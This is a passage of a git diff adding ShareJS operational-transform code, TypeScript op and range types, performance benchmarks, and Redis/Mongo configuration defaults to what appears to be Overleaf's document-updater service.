Array.from(makeTake(op)) + + for (component of Array.from(otherOp)) { + let chunk + let length = componentLength(component) + + if (component.i !== undefined) { + // Insert text or tombs + if (goForwards) { + // transform - insert skips over inserted parts + if (side === 'left') { + // The left insert should go first. + while (__guard__(peek(), x => x.i) !== undefined) { + append(newOp, take()) + } + } + + // In any case, skip the inserted text. + append(newOp, length) + } else { + // Prune. Remove skips for inserts. + while (length > 0) { + chunk = take(length, true) + + if (chunk === null) { + throw new Error('The transformed op is invalid') + } + if (chunk.d !== undefined) { + throw new Error( + 'The transformed op deletes locally inserted characters - it cannot be purged of the insert.' + ) + } + + if (typeof chunk === 'number') { + length -= chunk + } else { + append(newOp, chunk) + } + } + } + } else { + // Skip or delete + while (length > 0) { + chunk = take(length, true) + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(newOp, chunk) + if (!chunk.i) { + length -= componentLength(chunk) + } + } + } + } + + // Append extras from op1 + while ((component = take())) { + if (component.i === undefined) { + throw new Error(`Remaining fragments in the op: ${component}`) + } + append(newOp, component) + } + + return newOp +} + +// transform op1 by op2. Return transformed version of op1. +// op1 and op2 are unchanged by transform. +// side should be 'left' or 'right', depending on if op1.id <> op2.id. 'left' == client op. 
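+// For example (illustrative), with two concurrent inserts at position 2 of a
+// 5-character document:
+//
+//   transform([2, {i:'A'}, 3], [2, {i:'B'}, 3], 'left')  // => [2, {i:'A'}, 4]
+//   transform([2, {i:'B'}, 3], [2, {i:'A'}, 3], 'right') // => [3, {i:'B'}, 3]
+//
+// Either way the left (client) insert ends up before the right one.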
+type.transform = function (op, otherOp, side) { + if (side !== 'left' && side !== 'right') { + throw new Error(`side (${side}) should be 'left' or 'right'`) + } + return transformer(op, otherOp, true, side) +} + +// Prune is the inverse of transform. +type.prune = (op, otherOp) => transformer(op, otherOp, false) + +// Compose 2 ops into 1 op. +type.compose = function (op1, op2) { + let component + if (op1 === null || op1 === undefined) { + return op2 + } + + checkOp(op1) + checkOp(op2) + + const result = [] + + const [take, _] = Array.from(makeTake(op1)) + + for (component of Array.from(op2)) { + let chunk, length + if (typeof component === 'number') { + // Skip + // Just copy from op1. + length = component + while (length > 0) { + chunk = take(length) + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(result, chunk) + length -= componentLength(chunk) + } + } else if (component.i !== undefined) { + // Insert + append(result, { i: component.i }) + } else { + // Delete + length = component.d + while (length > 0) { + chunk = take(length) + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + const chunkLength = componentLength(chunk) + if (chunk.i !== undefined) { + append(result, { i: chunkLength }) + } else { + append(result, { d: chunkLength }) + } + + length -= chunkLength + } + } + } + + // Append extras from op1 + while ((component = take())) { + if (component.i === undefined) { + throw new Error(`Remaining fragments in op1: ${component}`) + } + append(result, component) + } + + return result +} + +if (typeof WEB !== 'undefined' && WEB !== null) { + exports.types['text-tp2'] = type +} else { + module.exports = type +} + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? transform(value) + : undefined +} diff --git a/services/document-updater/app/js/sharejs/types/text.js b/services/document-updater/app/js/sharejs/types/text.js new file mode 100644 index 0000000..ece4f86 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text.js @@ -0,0 +1,387 @@ +/* eslint-disable + no-return-assign, + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A simple text implementation +// +// Operations are lists of components. +// Each component either inserts or deletes at a specified position in the document. +// +// Components are either: +// {i:'str', p:100}: Insert 'str' at position 100 in the document +// {d:'str', p:100}: Delete 'str' at position 100 in the document +// +// Components in an operation are executed sequentially, so the position of components +// assumes previous components have already executed. +// +// Eg: This op: +// [{i:'abc', p:0}] +// is equivalent to this op: +// [{i:'a', p:0}, {i:'b', p:1}, {i:'c', p:2}] + +// NOTE: The global scope here is shared with other sharejs files when built with closure. +// Be careful what ends up in your namespace. 
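+//
+// A short illustrative example of the sequential-position rule: applying
+//   [{d:'world', p:6}, {i:'there', p:6}]
+// to 'hello world' first deletes 'world' (leaving 'hello '), then inserts at
+// position 6 of that intermediate string, giving 'hello there'.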
+ +let append, transformComponent +const text = {} + +text.name = 'text' + +text.create = () => '' + +const strInject = (s1, pos, s2) => s1.slice(0, pos) + s2 + s1.slice(pos) + +const checkValidComponent = function (c) { + if (typeof c.p !== 'number') { + throw new Error('component missing position field') + } + + const iType = typeof c.i + const dType = typeof c.d + const cType = typeof c.c + if (!((iType === 'string') ^ (dType === 'string') ^ (cType === 'string'))) { + throw new Error('component needs an i, d or c field') + } + + if (!(c.p >= 0)) { + throw new Error('position cannot be negative') + } +} + +const checkValidOp = function (op) { + for (const c of Array.from(op)) { + checkValidComponent(c) + } + return true +} + +text.apply = function (snapshot, op) { + checkValidOp(op) + for (const component of Array.from(op)) { + if (component.i != null) { + snapshot = strInject(snapshot, component.p, component.i) + } else if (component.d != null) { + const deleted = snapshot.slice( + component.p, + component.p + component.d.length + ) + if (component.d !== deleted) { + throw new Error( + `Delete component '${component.d}' does not match deleted text '${deleted}'` + ) + } + snapshot = + snapshot.slice(0, component.p) + + snapshot.slice(component.p + component.d.length) + } else if (component.c != null) { + const comment = snapshot.slice( + component.p, + component.p + component.c.length + ) + if (component.c !== comment) { + throw new Error( + `Comment component '${component.c}' does not match commented text '${comment}'` + ) + } + } else { + throw new Error('Unknown op type') + } + } + return snapshot +} + +// Exported for use by the random op generator. +// +// For simplicity, this version of append does not compress adjacent inserts and deletes of +// the same text. It would be nice to change that at some stage. +text._append = append = function (newOp, c) { + if (c.i === '' || c.d === '') { + return + } + if (newOp.length === 0) { + return newOp.push(c) + } else { + const last = newOp[newOp.length - 1] + + // Compose the insert into the previous insert if possible + if ( + last.i != null && + c.i != null && + last.p <= c.p && + c.p <= last.p + last.i.length + ) { + return (newOp[newOp.length - 1] = { + i: strInject(last.i, c.p - last.p, c.i), + p: last.p, + }) + } else if ( + last.d != null && + c.d != null && + c.p <= last.p && + last.p <= c.p + c.d.length + ) { + return (newOp[newOp.length - 1] = { + d: strInject(c.d, last.p - c.p, last.d), + p: c.p, + }) + } else { + return newOp.push(c) + } + } +} + +text.compose = function (op1, op2) { + checkValidOp(op1) + checkValidOp(op2) + + const newOp = op1.slice() + for (const c of Array.from(op2)) { + append(newOp, c) + } + + return newOp +} + +// Attempt to compress the op components together 'as much as possible'. +// This implementation preserves order and preserves create/delete pairs. +text.compress = op => text.compose([], op) + +text.normalize = function (op) { + const newOp = [] + + // Normalize should allow ops which are a single (unwrapped) component: + // {i:'asdf', p:23}. + // There's no good way to test if something is an array: + // http://perfectionkills.com/instanceof-considered-harmful-or-how-to-write-a-robust-isarray/ + // so this is probably the least bad solution. + if (op.i != null || op.p != null) { + op = [op] + } + + for (const c of Array.from(op)) { + if (c.p == null) { + c.p = 0 + } + append(newOp, c) + } + + return newOp +} + +// This helper method transforms a position by an op component. 
+// +// If c is an insert, insertAfter specifies whether the transform +// is pushed after the insert (true) or before it (false). +// +// insertAfter is optional for deletes. +const transformPosition = function (pos, c, insertAfter) { + if (c.i != null) { + if (c.p < pos || (c.p === pos && insertAfter)) { + return pos + c.i.length + } else { + return pos + } + } else if (c.d != null) { + // I think this could also be written as: Math.min(c.p, Math.min(c.p - otherC.p, otherC.d.length)) + // but I think its harder to read that way, and it compiles using ternary operators anyway + // so its no slower written like this. + if (pos <= c.p) { + return pos + } else if (pos <= c.p + c.d.length) { + return c.p + } else { + return pos - c.d.length + } + } else if (c.c != null) { + return pos + } else { + throw new Error('unknown op type') + } +} + +// Helper method to transform a cursor position as a result of an op. +// +// Like transformPosition above, if c is an insert, insertAfter specifies whether the cursor position +// is pushed after an insert (true) or before it (false). +text.transformCursor = function (position, op, side) { + const insertAfter = side === 'right' + for (const c of Array.from(op)) { + position = transformPosition(position, c, insertAfter) + } + return position +} + +// Transform an op component by another op component. Asymmetric. +// The result will be appended to destination. +// +// exported for use in JSON type +text._tc = transformComponent = function (dest, c, otherC, side) { + let cIntersect, intersectEnd, intersectStart, newC, otherIntersect + checkValidOp([c]) + checkValidOp([otherC]) + + if (c.i != null) { + append(dest, { + i: c.i, + p: transformPosition(c.p, otherC, side === 'right'), + }) + } else if (c.d != null) { + // Delete + if (otherC.i != null) { + // delete vs insert + let s = c.d + if (c.p < otherC.p) { + append(dest, { d: s.slice(0, otherC.p - c.p), p: c.p }) + s = s.slice(otherC.p - c.p) + } + if (s !== '') { + append(dest, { d: s, p: c.p + otherC.i.length }) + } + } else if (otherC.d != null) { + // Delete vs delete + if (c.p >= otherC.p + otherC.d.length) { + append(dest, { d: c.d, p: c.p - otherC.d.length }) + } else if (c.p + c.d.length <= otherC.p) { + append(dest, c) + } else { + // They overlap somewhere. + newC = { d: '', p: c.p } + if (c.p < otherC.p) { + newC.d = c.d.slice(0, otherC.p - c.p) + } + if (c.p + c.d.length > otherC.p + otherC.d.length) { + newC.d += c.d.slice(otherC.p + otherC.d.length - c.p) + } + + // This is entirely optional - just for a check that the deleted + // text in the two ops matches + intersectStart = Math.max(c.p, otherC.p) + intersectEnd = Math.min(c.p + c.d.length, otherC.p + otherC.d.length) + cIntersect = c.d.slice(intersectStart - c.p, intersectEnd - c.p) + otherIntersect = otherC.d.slice( + intersectStart - otherC.p, + intersectEnd - otherC.p + ) + if (cIntersect !== otherIntersect) { + throw new Error( + 'Delete ops delete different text in the same region of the document' + ) + } + + if (newC.d !== '') { + // This could be rewritten similarly to insert v delete, above. 
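+          // Illustrative overlap example: transforming c = {d:'bcd', p:1}
+          // against otherC = {d:'cde', p:2} keeps only the part of c that
+          // otherC did not already delete, appending {d:'b', p:1}.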
+ newC.p = transformPosition(newC.p, otherC) + append(dest, newC) + } + } + } else if (otherC.c != null) { + append(dest, c) + } else { + throw new Error('unknown op type') + } + } else if (c.c != null) { + // Comment + if (otherC.i != null) { + if (c.p < otherC.p && otherC.p < c.p + c.c.length) { + const offset = otherC.p - c.p + const newC = + c.c.slice(0, +(offset - 1) + 1 || undefined) + + otherC.i + + c.c.slice(offset) + append(dest, { c: newC, p: c.p, t: c.t }) + } else { + append(dest, { + c: c.c, + p: transformPosition(c.p, otherC, true), + t: c.t, + }) + } + } else if (otherC.d != null) { + if (c.p >= otherC.p + otherC.d.length) { + append(dest, { c: c.c, p: c.p - otherC.d.length, t: c.t }) + } else if (c.p + c.c.length <= otherC.p) { + append(dest, c) + } else { + // Delete overlaps comment + // They overlap somewhere. + newC = { c: '', p: c.p, t: c.t } + if (c.p < otherC.p) { + newC.c = c.c.slice(0, otherC.p - c.p) + } + if (c.p + c.c.length > otherC.p + otherC.d.length) { + newC.c += c.c.slice(otherC.p + otherC.d.length - c.p) + } + + // This is entirely optional - just for a check that the deleted + // text in the two ops matches + intersectStart = Math.max(c.p, otherC.p) + intersectEnd = Math.min(c.p + c.c.length, otherC.p + otherC.d.length) + cIntersect = c.c.slice(intersectStart - c.p, intersectEnd - c.p) + otherIntersect = otherC.d.slice( + intersectStart - otherC.p, + intersectEnd - otherC.p + ) + if (cIntersect !== otherIntersect) { + throw new Error( + 'Delete ops delete different text in the same region of the document' + ) + } + + newC.p = transformPosition(newC.p, otherC) + append(dest, newC) + } + } else if (otherC.c != null) { + append(dest, c) + } else { + throw new Error('unknown op type') + } + } + + return dest +} + +const invertComponent = function (c) { + if (c.i != null) { + return { d: c.i, p: c.p } + } else { + return { i: c.d, p: c.p } + } +} + +// No need to use append for invert, because the components won't be able to +// cancel with one another. +text.invert = op => + Array.from(op.slice().reverse()).map(c => invertComponent(c)) + +if (typeof WEB !== 'undefined' && WEB !== null) { + if (!exports.types) { + exports.types = {} + } + + // This is kind of awful - come up with a better way to hook this helper code up. + bootstrapTransform(text, transformComponent, checkValidOp, append) + + // [] is used to prevent closure from renaming types.text + exports.types.text = text +} else { + module.exports = text + + // The text type really shouldn't need this - it should be possible to define + // an efficient transform function by making a sort of transform map and passing each + // op component through it. + require('./helpers').bootstrapTransform( + text, + transformComponent, + checkValidOp, + append + ) +} diff --git a/services/document-updater/app/js/sharejs/types/web-prelude.js b/services/document-updater/app/js/sharejs/types/web-prelude.js new file mode 100644 index 0000000..a4c3a0f --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/web-prelude.js @@ -0,0 +1,14 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +// This is included at the top of each compiled type file for the web. 
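+//
+// The type files above branch on this flag, e.g. text-api.js does
+//   if (typeof WEB === 'undefined') { text = require('./text') }
+// so defining WEB here switches them onto their browser code paths.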
+ +/** + @const + @type {boolean} +*/ +const WEB = true + +const exports = window.sharejs diff --git a/services/document-updater/app/js/types.ts b/services/document-updater/app/js/types.ts new file mode 100644 index 0000000..b3085ad --- /dev/null +++ b/services/document-updater/app/js/types.ts @@ -0,0 +1,136 @@ +import { + TrackingPropsRawData, + ClearTrackingPropsRawData, +} from 'overleaf-editor-core/lib/types' + +/** + * An update coming from the editor + */ +export type Update = { + doc: string + op: Op[] + v: number + meta?: { + tc?: boolean + user_id?: string + ts?: number + } + projectHistoryId?: string +} + +export type Op = InsertOp | DeleteOp | CommentOp | RetainOp + +export type InsertOp = { + i: string + p: number + u?: boolean +} + +export type RetainOp = { + r: string + p: number +} + +export type DeleteOp = { + d: string + p: number + u?: boolean +} + +export type CommentOp = { + c: string + p: number + t: string + u?: boolean + // Used by project-history when restoring CommentSnapshots + resolved?: boolean +} + +/** + * Ranges record on a document + */ +export type Ranges = { + comments?: Comment[] + changes?: TrackedChange[] +} + +export type Comment = { + id: string + op: CommentOp + metadata?: { + user_id: string + ts: string + } +} + +export type TrackedChange = { + id: string + op: InsertOp | DeleteOp + metadata: { + user_id: string + ts: string + } +} + +/** + * Updates sent to project-history + */ +export type HistoryUpdate = { + op: HistoryOp[] + doc: string + v?: number + meta?: { + ts?: number + pathname?: string + doc_length?: number + history_doc_length?: number + doc_hash?: string + tc?: boolean + user_id?: string + } + projectHistoryId?: string +} + +export type HistoryOp = + | HistoryInsertOp + | HistoryDeleteOp + | HistoryCommentOp + | HistoryRetainOp + +export type HistoryInsertOp = InsertOp & { + commentIds?: string[] + hpos?: number + trackedDeleteRejection?: boolean +} + +export type HistoryRetainOp = RetainOp & { + hpos?: number + tracking?: TrackingPropsRawData | ClearTrackingPropsRawData +} + +export type HistoryDeleteOp = DeleteOp & { + hpos?: number + trackedChanges?: HistoryDeleteTrackedChange[] +} + +export type HistoryDeleteTrackedChange = { + type: 'insert' | 'delete' + offset: number + length: number +} + +export type HistoryCommentOp = CommentOp & { + hpos?: number + hlen?: number +} + +export type HistoryRanges = { + comments?: HistoryComment[] + changes?: HistoryTrackedChange[] +} + +export type HistoryComment = Comment & { op: HistoryCommentOp } + +export type HistoryTrackedChange = TrackedChange & { + op: HistoryInsertOp | HistoryDeleteOp +} diff --git a/services/document-updater/benchmarks/apply.js b/services/document-updater/benchmarks/apply.js new file mode 100644 index 0000000..2467678 --- /dev/null +++ b/services/document-updater/benchmarks/apply.js @@ -0,0 +1,78 @@ +const text = require('../app/js/sharejs/types/text.js') + +const TEST_RUNS = 1_000_000 +const MAX_OPS_BATCH_SIZE = 35 +const KB = 1000 + +function runTestCase(testCase, documentSizeBytes) { + const initialText = 'A'.repeat(documentSizeBytes) + + console.log(`test: ${testCase.name}`) + console.log(`opsBatchSize\topsPerSeconds ${documentSizeBytes / 1000}KB`) + for (let i = 1; i <= MAX_OPS_BATCH_SIZE; i++) { + const ops = testCase(documentSizeBytes, i) + + let timeTotal = 0 + for (let i = 0; i < TEST_RUNS; i++) { + const start = performance.now() + try { + text.apply(initialText, ops) + } catch { + console.error(`test failed: ${testCase.name}, with ops:`) + 
console.error(ops) + return + } + const done = performance.now() + timeTotal += done - start + } + + const opsPerSeconds = TEST_RUNS / (timeTotal / 1000) + console.log(`${i}\t${opsPerSeconds}`) + } +} + +const randomAdditionTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, () => ({ + p: Math.floor(Math.random() * docSize), + i: 'B', + })) + +const sequentialAdditionsTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ p: i + docSize, i: 'B' })) + +const sequentialAdditionsInMiddleTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: Math.floor(docSize / 2) + i, + i: 'B', + })) + +const randomDeletionTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: Math.floor(Math.random() * (docSize - 1 - i)), + d: 'A', + })) + +const sequentialDeletionTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: docSize - 1 - i, + d: 'A', + })) + +const sequentialDeletionInMiddleTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: Math.floor(docSize / 2), + d: 'A', + })) + +for (const docSize of [10 * KB, 100 * KB]) { + for (const testCase of [ + randomAdditionTestCase, + sequentialAdditionsTestCase, + sequentialAdditionsInMiddleTestCase, + randomDeletionTestCase, + sequentialDeletionTestCase, + sequentialDeletionInMiddleTestCase, + ]) { + runTestCase(testCase, docSize) + } +} diff --git a/services/document-updater/benchmarks/multi_vs_mget_mset.rb b/services/document-updater/benchmarks/multi_vs_mget_mset.rb new file mode 100644 index 0000000..ea953cd --- /dev/null +++ b/services/document-updater/benchmarks/multi_vs_mget_mset.rb @@ -0,0 +1,188 @@ +require "benchmark" +require "redis" + +N = (ARGV.first || 1).to_i +DOC_ID = (ARGV.last || "606072b20bb4d3109fb5b122") + +@r = Redis.new + + +def get + @r.get("doclines:{#{DOC_ID}}") + @r.get("DocVersion:{#{DOC_ID}}") + @r.get("DocHash:{#{DOC_ID}}") + @r.get("ProjectId:{#{DOC_ID}}") + @r.get("Ranges:{#{DOC_ID}}") + @r.get("Pathname:{#{DOC_ID}}") + @r.get("ProjectHistoryId:{#{DOC_ID}}") + @r.get("UnflushedTime:{#{DOC_ID}}") + @r.get("lastUpdatedAt:{#{DOC_ID}}") + @r.get("lastUpdatedBy:{#{DOC_ID}}") +end + +def mget + @r.mget( + "doclines:{#{DOC_ID}}", + "DocVersion:{#{DOC_ID}}", + "DocHash:{#{DOC_ID}}", + "ProjectId:{#{DOC_ID}}", + "Ranges:{#{DOC_ID}}", + "Pathname:{#{DOC_ID}}", + "ProjectHistoryId:{#{DOC_ID}}", + "UnflushedTime:{#{DOC_ID}}", + "lastUpdatedAt:{#{DOC_ID}}", + "lastUpdatedBy:{#{DOC_ID}}", + ) +end + +def set + @r.set("doclines:{#{DOC_ID}}", "[\"@book{adams1995hitchhiker,\",\" title={The Hitchhiker's Guide to the Galaxy},\",\" author={Adams, D.},\",\" isbn={9781417642595},\",\" url={http://books.google.com/books?id=W-xMPgAACAAJ},\",\" year={1995},\",\" publisher={San Val}\",\"}\",\"\"]") + @r.set("DocVersion:{#{DOC_ID}}", "0") + @r.set("DocHash:{#{DOC_ID}}", "0075bb0629c6c13d0d68918443648bbfe7d98869") + @r.set("ProjectId:{#{DOC_ID}}", "606072b20bb4d3109fb5b11e") + @r.set("Ranges:{#{DOC_ID}}", "") + @r.set("Pathname:{#{DOC_ID}}", "/references.bib") + @r.set("ProjectHistoryId:{#{DOC_ID}}", "") + @r.set("UnflushedTime:{#{DOC_ID}}", "") + @r.set("lastUpdatedAt:{#{DOC_ID}}", "") + @r.set("lastUpdatedBy:{#{DOC_ID}}", "") +end + +def mset + @r.mset( + "doclines:{#{DOC_ID}}", "[\"@book{adams1995hitchhiker,\",\" title={The Hitchhiker's Guide to the Galaxy},\",\" author={Adams, D.},\",\" isbn={9781417642595},\",\" url={http://books.google.com/books?id=W-xMPgAACAAJ},\",\" year={1995},\",\" 
publisher={San Val}\",\"}\",\"\"]", + "DocVersion:{#{DOC_ID}}", "0", + "DocHash:{#{DOC_ID}}", "0075bb0629c6c13d0d68918443648bbfe7d98869", + "ProjectId:{#{DOC_ID}}", "606072b20bb4d3109fb5b11e", + "Ranges:{#{DOC_ID}}", "", + "Pathname:{#{DOC_ID}}", "/references.bib", + "ProjectHistoryId:{#{DOC_ID}}", "", + "UnflushedTime:{#{DOC_ID}}", "", + "lastUpdatedAt:{#{DOC_ID}}", "", + "lastUpdatedBy:{#{DOC_ID}}", "", + ) +end + + +def benchmark_multi_get(benchmark, i) + benchmark.report("#{i}: multi get") do + N.times do + @r.multi do + get + end + end + end +end + +def benchmark_mget(benchmark, i) + benchmark.report("#{i}: mget") do + N.times do + mget + end + end +end + +def benchmark_multi_set(benchmark, i) + benchmark.report("#{i}: multi set") do + N.times do + @r.multi do + set + end + end + end +end + +def benchmark_mset(benchmark, i) + benchmark.report("#{i}: mset") do + N.times do + mset + end + end +end + + +# init +set + +Benchmark.bmbm do |benchmark| + 3.times do |i| + benchmark_multi_get(benchmark, i) + benchmark_mget(benchmark, i) + benchmark_multi_set(benchmark, i) + benchmark_mset(benchmark, i) + end +end + + + +=begin +# Results + +I could not max out the redis-server process with this benchmark. +The ruby process hit 100% of a modern i7 CPU thread and the redis-server process + barely hit 50% of a CPU thread. + +Based on the timings below, mget is about 3 times faster and mset about 4 times + faster than multiple get/set commands in a multi. +=end + +=begin +$ redis-server --version +Redis server v=5.0.7 sha=00000000:0 malloc=jemalloc-5.2.1 bits=64 build=636cde3b5c7a3923 +$ ruby multi_vs_mget_mset.rb 100000 +Rehearsal ------------------------------------------------ +0: multi get 12.132423 4.246689 16.379112 ( 16.420069) +0: mget 4.499457 0.947556 5.447013 ( 6.274883) +0: multi set 12.685936 4.495241 17.181177 ( 17.225984) +0: mset 2.543401 0.913448 3.456849 ( 4.554799) +1: multi get 13.397207 4.581881 17.979088 ( 18.027755) +1: mget 4.551287 1.160531 5.711818 ( 6.579168) +1: multi set 13.018957 4.927175 17.946132 ( 17.987502) +1: mset 2.561096 1.048416 3.609512 ( 4.780087) +2: multi get 13.224422 5.014475 18.238897 ( 18.284152) +2: mget 4.664434 1.051083 5.715517 ( 6.592088) +2: multi set 12.972284 4.600422 17.572706 ( 17.613185) +2: mset 2.621344 0.984123 3.605467 ( 4.766855) +------------------------------------- total: 132.843288sec + + user system total real +0: multi get 13.341552 4.900892 18.242444 ( 18.289912) +0: mget 5.056534 0.960954 6.017488 ( 6.971189) +0: multi set 12.989880 4.823793 17.813673 ( 17.858393) +0: mset 2.543434 1.025352 3.568786 ( 4.723040) +1: multi get 13.059379 4.674345 17.733724 ( 17.777859) +1: mget 4.698754 0.915637 5.614391 ( 6.489614) +1: multi set 12.608293 4.729163 17.337456 ( 17.372993) +1: mset 2.645290 0.940584 3.585874 ( 4.744134) +2: multi get 13.678224 4.732373 18.410597 ( 18.457525) +2: mget 4.716749 1.072064 5.788813 ( 6.697683) +2: multi set 13.058710 4.889801 17.948511 ( 17.988742) +2: mset 2.311854 0.989166 3.301020 ( 4.346467) +=end + +=begin +# multi get/set run at about O(65'000) operations per second +$ redis-cli info | grep 'instantaneous_ops_per_sec' +instantaneous_ops_per_sec:65557 + +# mget runs at about O(15'000) operations per second +$ redis-cli info | grep 'instantaneous_ops_per_sec' +instantaneous_ops_per_sec:14580 + +# mset runs at about O(20'000) operations per second +$ redis-cli info | grep 'instantaneous_ops_per_sec' +instantaneous_ops_per_sec:20792 + +These numbers are pretty reasonable: +multi: 100'000 * 12 ops / 18s 
= 66'666 ops/s +mget : 100'000 * 1 ops / 7s = 14'285 ops/s +mset : 100'000 * 1 ops / 5s = 20'000 ops/s + + + +Bonus: Running three benchmarks in parallel on different keys. +multi get: O(125'000) ops/s and 80% CPU load of redis-server +multi set: O(130'000) ops/s and 90% CPU load of redis-server +mget : O( 30'000) ops/s and 70% CPU load of redis-server +mset : O( 40'000) ops/s and 90% CPU load of redis-server +=end diff --git a/services/document-updater/buildscript.txt b/services/document-updater/buildscript.txt new file mode 100644 index 0000000..ee013eb --- /dev/null +++ b/services/document-updater/buildscript.txt @@ -0,0 +1,9 @@ +document-updater +--dependencies=mongo,redis +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 diff --git a/services/document-updater/config/settings.defaults.js b/services/document-updater/config/settings.defaults.js new file mode 100755 index 0000000..0cd29d3 --- /dev/null +++ b/services/document-updater/config/settings.defaults.js @@ -0,0 +1,187 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + internal: { + documentupdater: { + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + port: 3003, + }, + }, + + apis: { + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_API_PORT || process.env.WEB_PORT || 3000}`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + }, + project_history: { + url: `http://${process.env.PROJECT_HISTORY_HOST || '127.0.0.1'}:3054`, + }, + }, + + redis: { + pubsub: { + host: + process.env.PUBSUB_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + port: process.env.PUBSUB_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.PUBSUB_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + + history: { + port: process.env.HISTORY_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.HISTORY_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + password: + process.env.HISTORY_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + + project_history: { + port: process.env.HISTORY_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.HISTORY_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + password: + process.env.HISTORY_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `ProjectHistory:Ops:{${projectId}}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:{${projectId}}` + }, + }, + }, + + lock: { + port: process.env.LOCK_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.LOCK_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + password: + process.env.LOCK_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:{${docId}}` + }, + }, + }, 
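+    // Note on the key schemas below: the braces in keys such as
+    // `doclines:{docId}` are Redis Cluster hash tags. They pin every key
+    // belonging to one doc (or project) to the same hash slot, so multi-key
+    // commands and Lua scripts over a doc's keys keep working in cluster mode.
+    // For example, docLines({ doc_id: 'abc' }) yields 'doclines:{abc}'.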
+ + documentupdater: { + port: + process.env.DOC_UPDATER_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.DOC_UPDATER_REDIS_HOST || + process.env.REDIS_HOST || + '127.0.0.1', + password: + process.env.DOC_UPDATER_REDIS_PASSWORD || + process.env.REDIS_PASSWORD || + '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:{${docId}}` + }, + docLines({ doc_id: docId }) { + return `doclines:{${docId}}` + }, + docOps({ doc_id: docId }) { + return `DocOps:{${docId}}` + }, + docVersion({ doc_id: docId }) { + return `DocVersion:{${docId}}` + }, + docHash({ doc_id: docId }) { + return `DocHash:{${docId}}` + }, + projectKey({ doc_id: docId }) { + return `ProjectId:{${docId}}` + }, + docsInProject({ project_id: projectId }) { + return `DocsIn:{${projectId}}` + }, + ranges({ doc_id: docId }) { + return `Ranges:{${docId}}` + }, + unflushedTime({ doc_id: docId }) { + return `UnflushedTime:{${docId}}` + }, + pathname({ doc_id: docId }) { + return `Pathname:{${docId}}` + }, + projectHistoryId({ doc_id: docId }) { + return `ProjectHistoryId:{${docId}}` + }, + projectState({ project_id: projectId }) { + return `ProjectState:{${projectId}}` + }, + projectBlock({ project_id: projectId }) { + return `ProjectBlock:{${projectId}}` + }, + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:{${docId}}` + }, + lastUpdatedBy({ doc_id: docId }) { + return `lastUpdatedBy:{${docId}}` + }, + lastUpdatedAt({ doc_id: docId }) { + return `lastUpdatedAt:{${docId}}` + }, + resolvedCommentIds({ doc_id: docId }) { + return `ResolvedCommentIds:{${docId}}` + }, + flushAndDeleteQueue() { + return 'DocUpdaterFlushAndDeleteQueue' + }, + historyRangesSupport() { + return 'HistoryRangesSupport' + }, + }, + }, + }, + + max_doc_length: 2 * 1024 * 1024, // 2mb + maxJsonRequestSize: + parseInt(process.env.MAX_JSON_REQUEST_SIZE, 10) || 8 * 1024 * 1024, + + dispatcherCount: parseInt(process.env.DISPATCHER_COUNT || 10, 10), + + redisLockTTLSeconds: 30, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, + + publishOnIndividualChannels: + 